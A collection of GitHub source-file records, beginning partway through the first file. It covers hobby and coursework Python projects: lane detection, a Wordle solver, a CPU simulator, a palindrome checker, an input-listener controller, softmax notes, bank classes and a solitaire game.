self.rightLine[1]+dy1, self.rightLine[2]+dx2, self.rightLine[3]+dy2, 2]\n self.rightLine = np.array(a)\n\n\n if (self.rightLine[4] == 0) and (self.leftLine[4] !=0):\n dx1, dy1, dx2, dy2 = 0,0,0,0\n dx1 = self.rightLine[0] - self.rightLineOLD[0]\n dy1 = self.rightLine[1] - self.rightLineOLD[1]\n dx2 = self.rightLine[2] - self.rightLineOLD[2] \n dy2 = self.rightLine[3] - self.rightLineOLD[3]\n a = [self.leftLine[0]+dx1, self.leftLine[1]+dy1, self.leftLine[2]+dx2, self.leftLine[3]+dy2, 2]\n self.leftLine = np.array(a)\n except Exception as e:\n #print(e)\n pass\n\n def Do(self):\n self.canny()\n self.cropImage()\n self.makeLines()\n self.newDisplayer()\n self.averageLines()\n self.lineCorrection()\n\n\n\n def debug(self):\n try:\n #эта хуйня кароче вычисляет постоянный наклон (поворот дороги )\n leftVector = np.array([self.leftLine[0] - self.leftLine[2], self.leftLine[1] - self.leftLine[3]])\n rightVector = np.array([self.rightLine[0] - self.rightLine[2], self.rightLine[1] - self.rightLine[3]])\n #print(leftVector, rightVector)\n #print(leftVector + rightVector, \"\\n\")\n diff = (1280/2) - np.average([self.leftLine[0], self.rightLine[0]])\n force = diff #((diff/10))**2\n # if diff<0:\n # force = -force \n return force*1.5\n except Exception as e:\n return 0\n\n\n\nfoo = True\n# #video \ncap = cv2.VideoCapture(path)\n_, startImage = cap.read()\nvisor = visor(colorimage = startImage)\nwhile (cap.isOpened()) and foo:\n _, image = cap.read()\n visor.updateImage(image)\n visor.Do()\n visor.show()\n #force = visor.debug()\n #joystick.setMouseByForce(force)\n if cv2.waitKey(16) == ord(' '):\n break\n\n#############################################screen capture\n# startImage = grab.grab()\n# visor = visor(colorimage = startImage)\n\n# while True:\n# image = grab.grab()\n# visor.updateImage(image)\n# visor.Do()\n# visor.show()\n# force = visor.debug()\n# joystick.setMouseByForce(force)\n# if cv2.waitKey(33) == ord(' '):\n# break\n\n","repo_name":"Zakalenka23/e_vision","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71040233231","text":"\"\"\"\nLoad the contents of the file into the list.\n\n\nWhat am I trying to accomplish?\n\n1. Given an input, tell me the list of words that are probable candidates.\n2. From that\n\"\"\"\n\n# Let's filter out the 5 letter words to begin with.\n\nfrom collections import defaultdict\n\ndef get_all_words():\n \"\"\"\n Return the list of strings in the dictionary\n :return:\n \"\"\"\n with open('words.txt', 'r') as file:\n data = file.read().rstrip()\n return data.split('\\n')\n\nlowercase_letters = \"abcdefghijklmnopqrstuvwxyz\"\n\ndef is_lower_case_word(word):\n \"\"\"\n Return true if all the letters in x are lowercase alphabets\n :param x:\n :return:\n \"\"\"\n for a in word:\n if a not in lowercase_letters:\n return False\n return True\n\n\ndef filter_valid_words(list_of_words):\n list_of_words = map(lambda x: x.lower(), list_of_words)\n\n return [a for a in filter(lambda x: len(x) == 5 and is_lower_case_word(x),\n list_of_words)]\n\n\n\"\"\"\nAm here to solve for wordle.\nI should be able to guess the word in the quickest manner possible.\nFirst guess should be to get the most amount of information.\nOnce the information is fed in,\nMake the next guess in such a way that you again get the most amount of \ninformation.\n\n\n\"\"\"\n\ndef word_passes_the_sieve(possible_wordle, sieve):\n # honor all the conditions of the sieve\n # If one of the condition fails, return false.\n for typ, letter, position in sieve:\n if typ == \"g\":\n cur_flag = (possible_wordle[position - 1] == letter)\n elif typ == 'y':\n cur_flag = (letter in possible_wordle) and (possible_wordle[\n position - 1] != letter)\n else:\n cur_flag = (letter not in possible_wordle)\n if not cur_flag:\n return False\n return True\n\n\ndef update_wordles_sieve(possible_wordles, sieve):\n ret = []\n for possible_wordle in possible_wordles:\n if word_passes_the_sieve(possible_wordle, sieve):\n ret.append(possible_wordle)\n return ret\n\n\nclass PossibleWordles():\n def __init__(self, possible_wordles):\n self.possible_wordles = possible_wordles\n \"\"\"\n Let's just use the strategy of using the words that have the most \n character count.\n \"\"\"\n self.char_count = self.construct_char_count(self.possible_wordles)\n self.ranked_wordles = self.rank_wordles_based_on_count(\n self.possible_wordles, self.char_count)\n\n @staticmethod\n def rank_wordles_based_on_count(possible_wordles, char_count):\n ranked_wordles = [] # tuple of (score, word)\n \"\"\"\n Score is the sum of char counts of the unique letters in the word.\n \"\"\"\n for wordle in possible_wordles:\n score = 0\n for letter in set(wordle):\n score += char_count[letter]\n ranked_wordles.append((score, wordle))\n return sorted(ranked_wordles, key=lambda x: x[0], reverse=True)\n\n\n @staticmethod\n def construct_char_count(possible_wordles):\n char_count = defaultdict(int)\n for wordle in possible_wordles:\n for letter in set(wordle):\n char_count[letter] = char_count[letter] + 1\n return char_count\n\n def get_ranked_wordles(self):\n return self.ranked_wordles\n\n\ndef update_sieve(guess, colours, sieve):\n for i in range(0, 5):\n letter = guess[i]\n colour = colours[i]\n sieve.append((colour, letter, i + 1 if colour != 'b' else 0))\n\n\"\"\"\nFor now what I want is that, given a list of words, what is the best word to guess,\nso that I am able to narrow down to the exact word as fast as possible.\n\nThe goal is to narrow down the sieve very effeciently.\n\nEffective score of the word should be computed.\nThe definition of the effective score is that:\n The expected number of words that will be in the list post this guess. The word that has the minimum score is the best guess.\n For a given word the expected number of words that will be in the list post the guess will be as follows:\n 1. All I know is that any of the words in the sieve is a probable candidate.\n If the word x is the answer, what is the score of the word y?\n Over all possible combinations, which word reduced the sieve by a lot? Something to think about.\n Wordle isn't adding quite a bit of value at this point in time. But you are pondering over it for some reason.\n \n \n \n\"\"\"\n\n\ndef main():\n all_words = get_all_words()\n wordles = filter_valid_words(all_words)\n possible_wordles = wordles\n sieve = [] # character to the position or 'y' or 'n'\n while True:\n guess = str(input())\n if guess == \"done\":\n break\n else:\n colours = str(input())\n update_sieve(guess, colours, sieve)\n\n possible_wordles = update_wordles_sieve(possible_wordles, sieve)\n wordles_container = PossibleWordles(possible_wordles)\n print(\"count \" + str(len(possible_wordles)))\n ranked_wordles = wordles_container.ranked_wordles\n for i in range(0, min(20, len(ranked_wordles))):\n print(ranked_wordles[i])\n\n\n\nmain()\n","repo_name":"ranji100/wordle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25439170794","text":"#!/usr/bin/python3\n# pylint: disable=missing-function-docstring\n# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=too-many-instance-attributes\n# pylint: disable=invalid-name\n# pylint: disable=consider-using-f-string\n\nimport logging\nfrom collections import deque\nimport sys\n\nfrom typing import List, Tuple, Deque\n\nfrom isa import Opcode, read_code, STDOUT_PORT, STDIN_PORT, ops_gr, \\\n reversed_addr_instruction_code, \\\n reversed_io_instruction_code, \\\n reversed_branch_instruction_code\n\n\nclass RegisterUnit:\n registers: List[int]\n rd: int\n rs1: int\n rs2: int\n\n def __init__(self, registers_count: int) -> None:\n self.registers = [0] * registers_count\n self.rd = 0\n self.rs1 = 0\n self.rs2 = 0\n\n def latch_sel_rd(self, number: int):\n self.rd = number\n\n def latch_sel_rs1(self, number: int):\n self.rs1 = number\n\n def latch_sel_rs2(self, number: int):\n self.rs2 = number\n\n def get_rs1_data(self):\n return self.registers[self.rs1]\n\n def get_rs2_data(self):\n return self.registers[self.rs2]\n\n def set_rd_data(self, data):\n if self.rd != 0:\n self.registers[self.rd] = int(data)\n\n\nclass ALU:\n output: int\n a: int\n b: int\n _operations_ = {\n Opcode.ADD: lambda a, b: a + b,\n Opcode.SUB: lambda a, b: a - b,\n Opcode.MUL: lambda a, b: a * b,\n Opcode.DIV: lambda a, b: a // b,\n Opcode.REM: lambda a, b: a % b,\n }\n\n def __init__(self) -> None:\n self.output = 0\n self.a = 0\n self.b = 0\n\n def load(self, a: int, b: int):\n self.a = a\n self.b = b\n\n def compute(self, operation: Opcode) -> int:\n self.output = int(self._operations_[operation](self.a, self.b))\n return self.output\n\n\nclass BranchComparator:\n a: int\n b: int\n\n def __init__(self) -> None:\n self.a = 0\n self.b = 0\n\n def load(self, a: int, b: int):\n self.a = a\n self.b = b\n\n def compare(self) -> Tuple[bool, bool]:\n return self.a == self.b, self.a < self.b\n\n\nclass IO:\n input_buffer: deque\n\n def __init__(self, input_tokens: list) -> None:\n self.input_buffer = deque(input_tokens)\n self.output_buffer = deque()\n\n def eof(self):\n return not self.input_buffer\n\n def input(self):\n return self.input_buffer.popleft()\n\n def output(self, character):\n self.output_buffer.append(character)\n\n\nclass DataPath:\n memory: List[int]\n current_address: int\n instruction_pointer: int\n data_memory_size: int\n ru: RegisterUnit\n alu: ALU\n bc: BranchComparator\n io: IO\n\n immediately_generator: int\n current_instruction: Tuple[Opcode, List[int]]\n args: Deque[int]\n\n def __init__(self, data: List[int], data_memory_size: int, input_buffer: list):\n assert data_memory_size > 0, \"Data_memory size should be non-zero\"\n self.data_memory_size = data_memory_size\n self.memory = data\n self.current_data = 0\n self.current_address = 0\n self.instruction_pointer = 0\n self.io = IO([ord(token) for token in input_buffer])\n self.immediately_generator = 0\n self.current_instruction = Opcode.HALT, []\n self.args: deque[str]\n self.ru = RegisterUnit(5)\n self.alu = ALU()\n self.bc = BranchComparator()\n\n def select_instruction(self) -> Opcode:\n self.current_instruction = \\\n DataPath.decode_instruction(self.memory[self.instruction_pointer:self.instruction_pointer + 4])\n opcode, args = self.current_instruction\n self.args = deque(args)\n self.instruction_pointer += 4\n\n return opcode\n\n def latch_dest_reg_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rd(int(arg))\n\n def latch_rs1_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rs1(int(arg))\n\n def latch_rs2_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rs2(int(arg))\n\n def latch_imm_gen(self):\n self.immediately_generator = int(self.args.popleft())\n\n def latch_rs1_to_alu(self):\n self.alu.a = self.ru.get_rs1_data()\n\n def latch_rs2_to_alu(self):\n self.alu.b = self.ru.get_rs2_data()\n\n def latch_imm_to_alu(self):\n \"\"\"Загружает непосредственное значение в ALU\"\"\"\n self.alu.b = self.immediately_generator\n\n def compute_alu(self, opcode: Opcode):\n self.alu.compute(opcode)\n\n def latch_address_to_memory(self):\n \"\"\"Загружает целевой адрес в память\"\"\"\n self.current_address = self.ru.get_rs1_data()\n self.current_data = self.get_data_from_memory(self.current_address)\n\n def store_data_to_memory_from_reg(self):\n \"\"\"Загружает данные в память\"\"\"\n self.set_data_to_memory(self.ru.get_rs1_data(), self.ru.get_rs2_data())\n\n def store_data_to_memory_from_imm(self):\n \"\"\"Загружает данные в память\"\"\"\n self.set_data_to_memory(self.ru.get_rs1_data(), self.immediately_generator)\n\n def latch_address_to_memory_from_imm(self):\n self.current_address = self.immediately_generator\n self.current_data = self.get_data_from_memory(self.current_address)\n\n def latch_reg_from_memory(self):\n \"\"\"Значение из памяти перезаписывает регистр\"\"\"\n self.ru.set_rd_data(self.current_data)\n\n def latch_reg_from_alu(self):\n \"\"\"ALU перезаписывает регистр\"\"\"\n self.ru.set_rd_data(self.alu.output)\n\n def latch_program_counter(self):\n \"\"\"Перезаписывает значение PC из ImmGen\"\"\"\n self.instruction_pointer = self.immediately_generator\n\n def latch_regs_to_bc(self):\n \"\"\"Загружает регистры в Branch Comparator.\"\"\"\n self.bc.a, self.bc.b = \\\n self.ru.get_rs1_data(), self.ru.get_rs2_data()\n return self.bc.compare()\n\n def get_data_from_memory(self, address: int) -> int:\n x = 256\n return self.memory[address] * x ** 3 + self.memory[address + 1] * x ** 2 + \\\n self.memory[address + 2] * x + self.memory[address + 3]\n\n def set_data_to_memory(self, address: int, value: int):\n x = 256\n self.memory[address] = value // (x ** 3) % x\n self.memory[address + 1] = value // (x ** 2) % x\n self.memory[address + 2] = value // x % x\n self.memory[address + 3] = value % x\n\n def latch_instruct(self):\n opcode, _ = self.current_instruction\n if opcode is Opcode.JMP:\n self.latch_imm_gen()\n elif opcode is Opcode.LW and self.args[-1] == 2:\n self.latch_dest_reg_from_instr()\n self.latch_imm_gen()\n elif opcode is Opcode.LW:\n self.latch_dest_reg_from_instr()\n self.latch_rs1_from_instr()\n elif opcode is Opcode.SW:\n self.latch_rs1_from_instr()\n self.latch_rs2_from_instr()\n elif opcode is Opcode.SW and self.args[-1] == 2:\n self.latch_rs1_from_instr()\n self.latch_imm_gen()\n elif opcode in ops_gr[\"branch\"]:\n self.latch_rs1_from_instr()\n self.latch_rs2_from_instr()\n self.latch_imm_gen()\n elif opcode in ops_gr['arith']:\n self.latch_dest_reg_from_instr()\n self.latch_rs1_from_instr()\n if self.args[-1] == 2:\n self.latch_imm_gen()\n else:\n self.latch_rs2_from_instr()\n elif opcode is Opcode.IN:\n self.latch_dest_reg_from_instr()\n self.latch_imm_gen()\n elif opcode is Opcode.OUT:\n self.latch_rs1_from_instr()\n self.latch_imm_gen()\n\n @staticmethod\n def decode_instruction(instr: List[int]) -> Tuple[Opcode, List[int]]:\n assert len(instr) == 4, \"Invalid instruction len\"\n nimble = 2 ** 4\n\n bin_opcode = instr[0] // nimble\n \"\"\" HALT \"\"\"\n if bin_opcode == 0:\n return Opcode.HALT, []\n if bin_opcode == 1:\n args = [\n instr[1] // nimble, # register to io\n bytes_to_number(instr[2], instr[3]), # io port\n ]\n\n return reversed_io_instruction_code[instr[0] % nimble], args\n\n \"\"\" Arithmetic instructions \"\"\"\n if 2 <= bin_opcode <= 6:\n addressing_type = instr[0] % nimble\n args = [\n instr[1] // nimble, # res reg\n instr[1] % nimble, # reg1\n (bytes_to_number(instr[2], instr[3]) # number\n if addressing_type == 2\n else instr[2] // nimble), # reg2\n addressing_type,\n\n ]\n return reversed_addr_instruction_code[bin_opcode], args\n\n \"\"\" Mem-instructions \"\"\"\n if 7 <= bin_opcode <= 8:\n addressing_type = instr[0] % nimble\n args = [\n instr[1] // nimble, # res reg\n (bytes_to_number(instr[2], instr[3]) # number\n if addressing_type == 2\n else instr[1] % nimble), # reg1\n addressing_type,\n ]\n return reversed_addr_instruction_code[bin_opcode], args\n\n \"\"\" Branch instructions \"\"\"\n if bin_opcode == 15:\n bin_opcode_extension = instr[0] % nimble\n offset = bytes_to_number(instr[2], instr[3])\n args = list()\n if bin_opcode_extension == 0:\n args.append(offset)\n else:\n args.append(instr[1] // nimble) # reg1\n args.append(instr[1] % nimble) # reg2\n args.append(offset)\n\n return reversed_branch_instruction_code[bin_opcode_extension], args\n\n raise SyntaxError(f\"Unknown binary instruction: {instr}\")\n\n\ndef bytes_to_number(upper_byte: int, lower_byte: int):\n return upper_byte * 2 ** 8 + lower_byte\n\n\nclass ControlUnit:\n data_path: DataPath\n\n def __init__(self, data_path):\n self.data_path = data_path\n self._tick = 0\n\n def tick(self):\n \"\"\"Счётчик тактов процессора. Вызывается при переходе на следующий такт.\"\"\"\n logging.debug('%s', self)\n self._tick += 1\n\n def current_tick(self):\n \"\"\"Возвращает текущий такт.\"\"\"\n return self._tick\n\n def decode_and_execute_instruction(self):\n opcode = Opcode(self.data_path.select_instruction())\n dp = self.data_path\n dp.latch_instruct()\n self.tick()\n\n if opcode is Opcode.JMP:\n dp.latch_program_counter()\n elif opcode in ops_gr[\"branch\"]:\n equals, less = dp.latch_regs_to_bc()\n self.tick()\n if any([\n opcode is Opcode.BEQ and equals,\n opcode is Opcode.BNE and not equals,\n opcode is Opcode.BLT and less,\n opcode is Opcode.BNL and not less,\n opcode is Opcode.BGT and not less and not equals,\n opcode is Opcode.BNG and (less or equals)\n ]):\n dp.latch_program_counter()\n elif opcode is Opcode.LW and self.data_path.args[-1] == 2:\n dp.latch_address_to_memory_from_imm()\n self.tick()\n dp.latch_reg_from_memory()\n elif opcode is Opcode.LW:\n dp.latch_address_to_memory()\n self.tick()\n dp.latch_reg_from_memory()\n elif opcode is Opcode.SW:\n dp.store_data_to_memory_from_reg()\n elif opcode is Opcode.SW and self.data_path.args[-1] == 2:\n dp.store_data_to_memory_from_imm()\n elif opcode in ops_gr[\"arith\"]:\n if self.data_path.args[-1] == 2:\n dp.latch_imm_to_alu()\n else:\n dp.latch_rs2_to_alu()\n dp.latch_rs1_to_alu()\n dp.compute_alu(opcode=opcode)\n self.tick()\n dp.latch_reg_from_alu()\n\n elif opcode in ops_gr[\"io\"]:\n if self.data_path.immediately_generator == STDOUT_PORT:\n self.data_path.io.output(self.data_path.ru.get_rs1_data())\n # TODO вынести в отдельный метод внутри дадапас\n elif self.data_path.immediately_generator == STDIN_PORT:\n if self.data_path.io.eof():\n raise EOFError\n self.data_path.ru.set_rd_data(self.data_path.io.input())\n # TODO вынести в отдельный метод внутри дадапас\n\n elif opcode is Opcode.HALT:\n raise StopIteration()\n\n self.tick()\n\n def __repr__(self):\n state = \"{{TICK: {}, PC: {}, ADDR: {}, OUT: }}\".format(\n self._tick,\n self.data_path.instruction_pointer,\n self.data_path.current_address\n # self.data_path.output_buffer[0]\n )\n\n registers = \"{{[rd: {}, rs1: {}, rs2: {}, imm: {}] Regs {} }}\".format(\n self.data_path.ru.rd,\n self.data_path.ru.rs1,\n self.data_path.ru.rs2,\n self.data_path.immediately_generator,\n f\"[{' '.join([str(reg) for reg in self.data_path.ru.registers])}]\"\n )\n\n opcode, args = self.data_path.current_instruction\n\n action = \"{} {}\".format(\n opcode, f\"[{' '.join([str(arg) for arg in args])}]\")\n alu = \"ALU [a:{} b:{} output:{}]\".format(\n self.data_path.alu.a, self.data_path.alu.b, self.data_path.alu.output)\n\n return \"{} {} {} {} \".format(state, registers, alu, action)\n\n\ndef show_memory(data_memory) -> str:\n data_memory_state = \"\"\n\n for address, cell in enumerate(reversed(data_memory)):\n cell = int(cell)\n # binary representation == br\n address = len(data_memory) - address - 1\n cell_br = bin(cell)[2:]\n address_br = bin(address)[2:]\n cell_br = (8 - len(cell_br)) * \"0\" + cell_br\n address_br = (10 - len(address_br)) * \"0\" + address_br\n data_memory_state += f\"[{{{address:5}}}\\\n [{address_br:10}] -> [{cell_br:8}] = ({cell:10})\\n\"\n return data_memory_state\n\n\ndef simulation(data: List[int], input_tokens, data_memory_size, limit):\n \"\"\"Запуск симуляции процессора.\n\n Длительность моделирования ограничена количеством выполненных инструкций.\n \"\"\"\n # logging.info(\"{ INPUT MESSAGE } [ `%s` ]\", \"\".join(input_tokens))\n # logging.info(\"{ INPUT TOKENS } [ %s ]\", \",\".join(\n # [str(ord(token)) for token in input_tokens]))\n\n data_path = DataPath(data, data_memory_size, input_tokens)\n control_unit = ControlUnit(data_path)\n instr_counter = 0\n\n try:\n while True:\n if not limit > instr_counter:\n print(\"too long execution, increase limit!\")\n break\n control_unit.decode_and_execute_instruction()\n instr_counter += 1\n except EOFError:\n logging.warning('Input buffer is empty!')\n except StopIteration:\n pass\n\n return ''.join(map(chr, data_path.io.output_buffer)), instr_counter, \\\n control_unit.current_tick(), show_memory(data_path.memory)\n\n\ndef main(args):\n assert len(args) == 2, \\\n \"Wrong arguments: machine.py \"\n code_file, input_file = args\n\n memory_data = read_code(code_file)\n\n with open(input_file, encoding=\"utf-8\") as file:\n input_text = file.read()\n input_token = []\n for char in input_text:\n input_token.append(char)\n input_token.append(chr(0))\n\n output, instr_counter, ticks, data_memory_state = simulation(\n memory_data,\n input_tokens=input_token,\n data_memory_size=250,\n limit=12000\n )\n # logging.info(\"%s\", f\"Memory map is\\n{data_memory_state}\")\n\n print(f\"Output is `{''.join(output)}`\")\n print(f\"instr_counter: {instr_counter} ticks: {ticks}\")\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.DEBUG)\n main(sys.argv[1:])\n","repo_name":"farid03/csa-lab3","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":16313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31928408434","text":"from pilha import Pilha\n\nfrase = input(\"Escreva uma palavra ou frase: \")\n\npalavras = frase.split()\npalindormo = 0\n\ndef isPalindromo(wr):\n tam = len(wr)\n fim = \".\"\n mid = (tam//2) + (tam%2) #define o meio da palavra\n pilha = Pilha()\n pilha.push(fim)\n\n if (tam < 3):return False\n\n for i in range(tam):\n if i < mid-1:\n pilha.push(wr[i])\n elif (i == mid-1):\n continue\n else:\n x = pilha.peek()\n if (x == wr[i]):\n pilha.pop()\n\n return (pilha.peek()==fim)\n\nquant = 0\nsaida=\"\"\n\nfor w in palavras:\n p = isPalindromo(w)\n if p:\n quant += 1\n saida = saida + str(\"[\"+w+\"] \")\n else:saida = saida + w + \" \"\n\nprint(\"Tem {0} palindromo\".format(quant))\nprint(saida)\n\n\"\"\"\n\ndef isPrimo(n):\n for _ in range(2,n):\n if _>=n:return True\n elif n%_ < 1:return False\n return True\n\n\nfor i in range(2,1000):\n x=isPrimo(i)\n if x:\n print(i)\n\"\"\"","repo_name":"laelMatos/AutomatoDePilha","sub_path":"AtomatoDePilha.py","file_name":"AtomatoDePilha.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73543092430","text":"from pynput import keyboard, mouse\n\nfrom hades.controller.base import Controller\nfrom hades.lib import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass InputController(Controller):\n\n def __init__(self):\n from hades.controller.callback import noop, on_click, on_press, on_release\n self.listeners = [\n keyboard.Listener(\n on_press=on_press,\n on_release=on_release,\n ),\n mouse.Listener(\n on_move=noop,\n on_click=on_click,\n on_scroll=noop,\n ),\n ]\n\n def start(self):\n for listener in self.listeners:\n listener.start()\n listener.wait()\n\n def stop(self):\n for listener in self.listeners:\n listener.stop()\n\n @property\n def running(self):\n return all([listener.running for listener in self.listeners])\n\n\ninput_controller = InputController()\n","repo_name":"JELGT2011/hades","sub_path":"hades/controller/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27107048735","text":"import numpy as np\n\ndef softmax(a):\n exp_a = np.exp(a)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n\n return y\n\na=np.array([0.3,2.9,4.0])\n\nprint(softmax(a))\n#[0.01821127 0.24519181 0.73659691]\n\n\n# [문제점] e^1000같이 큰수는 inf가 되어 돌아온다. 한계가 있다. 개선 필요!\n# 해결: 식을 써서 계산해보면 각각 같은값을 더하거나 뺴도 softmax같음. 고로 최대값을 빼자\n\ndef softmax2(a):\n c=np.max(a)\n exp_a = np.exp(a-c)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n\n return y\n\nb=np.array([1000,1010,990])\nprint(softmax(b))\nprint(softmax2(b))\n\n# [nan nan nan]\n# [4.53978686e-05 9.99954600e-01 2.06106005e-09]\n# 해결!\n\n\n#softmax 특징\n#1. 모두 0과 1.0사이임\n#2. 모든 합이 1임\n#>>>확률로 해석 가능","repo_name":"chminsta/DeepLearning_fromScratch","sub_path":"NEURAL_NETWORK3.PY","file_name":"NEURAL_NETWORK3.PY","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15497396167","text":"from banco.banco import Banco\nfrom cliente.cliente import Cliente\nfrom conta.contacorrente import ContaCorrente\nfrom conta.contapoupanca import ContaPoupanca\n\nbanco = Banco()\n\ncliente1 = Cliente('Marcos', 25)\ncliente2 = Cliente('Paulo', 26)\ncliente3 = Cliente('Maria', 32)\n\nconta1 = ContaPoupanca(1111, 254136, 0)\nconta2 = ContaCorrente(2222, 254137, 0)\nconta3 = ContaPoupanca(1212, 254138, 0)\n\ncliente1.conta = conta1\ncliente2.conta = conta2\ncliente3.conta = conta3\n\nbanco.inserir_clientes(cliente1)\nbanco.inserir_conta(conta1)\n\nbanco.inserir_clientes(cliente2)\nbanco.inserir_conta(conta2)\n\nif banco.autenticar(cliente1):\n cliente1.conta.depositar(0)\n cliente1.conta.sacar(20)\nelse:\n print('Cliente não autenticado.')\n\nprint('####################')\n\nif banco.autenticar(cliente2):\n cliente2.conta.depositar(0)\n cliente2.conta.sacar(20)\nelse:\n print('Cliente não autenticado.')\n","repo_name":"santosbpm/projetos_curso_python","sub_path":"01_ContaBancaria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25816421705","text":"DATABASE = \"database.db\"\r\nimport os, sqlite3\r\n\r\ndef open_db(db = DATABASE):\r\n with sqlite3.connect(db) as con:\r\n return con\r\n \r\ndef init_database(DATABASE):\r\n con = open_db()\r\n con.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY, name TEXT, age INTEGER)\")\r\n con.close()\r\n\r\nif os.path.exists(DATABASE):\r\n print (\"Database exists, moving on...\")\r\nelse:\r\n print (\"Database does not exist, creating...\")\r\n init_database(DATABASE)","repo_name":"NgoThanhHieu/Python-4C","sub_path":"Flask/DB/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71620317390","text":"from clint.textui import puts, colored, indent, columns, prompt\r\n\r\nfrom .Stack import Foundation, Stock, Column\r\nfrom .Deck import Deck\r\nfrom .Card import Suit, Rank, Color\r\n\r\n_NUM_COLUMNS = 7\r\n\r\n\r\nclass Game:\r\n\r\n def __init__(self):\r\n self.setup()\r\n self.print()\r\n\r\n # Start game\r\n self.game_loop()\r\n\r\n def _error(self, error):\r\n puts(colored.magenta(error, False, True))\r\n\r\n def _is_int(self, string):\r\n try:\r\n int(string)\r\n except:\r\n return False\r\n return True\r\n\r\n def _validate_index(self, index):\r\n if index < 0 or index >= len(self.columns):\r\n return False\r\n return True\r\n\r\n def game_loop(self):\r\n while True:\r\n command = prompt.query('>')\r\n if command == 'restart':\r\n self.setup()\r\n self.print()\r\n elif command == 'print':\r\n self.print()\r\n elif command == 'help':\r\n puts('Pile Ids:')\r\n for pile_id, pile in self.ids_to_piles.items():\r\n puts(colored.blue(\"%s: \" % pile_id) + pile.name)\r\n puts('All commands:')\r\n with indent(3, '>'):\r\n puts(colored.cyan('restart') + ': restarts the game.')\r\n puts(colored.cyan('print') + ': print the current state of the board.')\r\n puts(colored.cyan('draw')) + ': draw a card from stock.'\r\n puts(colored.cyan('mv x y') + ': moves the top card from pile x to pile y, where x and y are pile ids.')\r\n puts(colored.cyan('discard') + ': puts the top card of the stock pile into discards.')\r\n puts(colored.cyan('quit') + ': quits the game.')\r\n elif command == 'draw':\r\n self.stock.draw()\r\n self.print()\r\n elif command.startswith('mv'):\r\n params = command.split(' ')\r\n if len(params) != 3:\r\n self._error('Invalid: mv must have 2 params.')\r\n elif not self.ids_to_piles.get(params[1], False) or not self.ids_to_piles.get(params[2], False):\r\n self._error('Invalid: params must be valid ids. Type ' + colored.cyan('help') + ' to see the list of valid ids.')\r\n else:\r\n move_from = self.ids_to_piles[params[1]]\r\n move_to = self.ids_to_piles[params[2]]\r\n if not move_from.move_top_to(move_to):\r\n self._error('Invalid play.')\r\n else:\r\n self.print()\r\n win = True\r\n for _, foundation in self.foundations.items():\r\n if not foundation.full:\r\n win = False\r\n break\r\n\r\n if win:\r\n puts(colored.green('Congratulations, you have won the game!'))\r\n again = prompt.query('Type \"y\" to play again!')\r\n if again == 'y':\r\n self.setup()\r\n else:\r\n break\r\n elif command == 'quit':\r\n break\r\n else:\r\n self._error('Invalid command.')\r\n puts('Type ' + colored.cyan('help') + ' to see all available commands.')\r\n\r\n def setup(self):\r\n self.deck = Deck()\r\n self.deck.shuffle()\r\n\r\n # Setup foundations\r\n self.foundations = dict()\r\n self.foundations[Suit.HEART] = Foundation(Suit.HEART)\r\n self.foundations[Suit.DIAMOND] = Foundation(Suit.DIAMOND)\r\n self.foundations[Suit.CLUB] = Foundation(Suit.CLUB)\r\n self.foundations[Suit.SPADE] = Foundation(Suit.SPADE)\r\n\r\n # Setup column piles\r\n self.columns = []\r\n for i in range(_NUM_COLUMNS):\r\n self.columns.append(Column(i + 1))\r\n\r\n # Deal cards\r\n for start_index in range(_NUM_COLUMNS):\r\n next_card = self.deck.get_next()\r\n next_card.flip()\r\n self.columns[start_index].deal(next_card)\r\n for index in range(start_index + 1, _NUM_COLUMNS):\r\n next_card = self.deck.get_next()\r\n self.columns[index].deal(next_card)\r\n\r\n # Setup stock pile\r\n self.stock = Stock()\r\n card = self.deck.get_next()\r\n while card:\r\n card.flip()\r\n self.stock.place(card)\r\n card = self.deck.get_next()\r\n\r\n # Setup ids\r\n self.ids_to_piles = {\r\n 'st': self.stock,\r\n '1': self.columns[0],\r\n '2': self.columns[1],\r\n '3': self.columns[2],\r\n '4': self.columns[3],\r\n '5': self.columns[4],\r\n '6': self.columns[5],\r\n '7': self.columns[6],\r\n 'h': self.foundations[Suit.HEART],\r\n 'd': self.foundations[Suit.DIAMOND],\r\n 'c': self.foundations[Suit.CLUB],\r\n 's': self.foundations[Suit.SPADE]\r\n }\r\n\r\n def print(self):\r\n puts(colored.blue(\"Stock: \", False, True) + self.stock.print())\r\n for index, column in enumerate(self.columns):\r\n puts(colored.blue(\"Column %d: \" % (index + 1)) + column.print())\r\n for key, foundation in self.foundations.items():\r\n puts(colored.blue(\"%s: \" % key.name) + 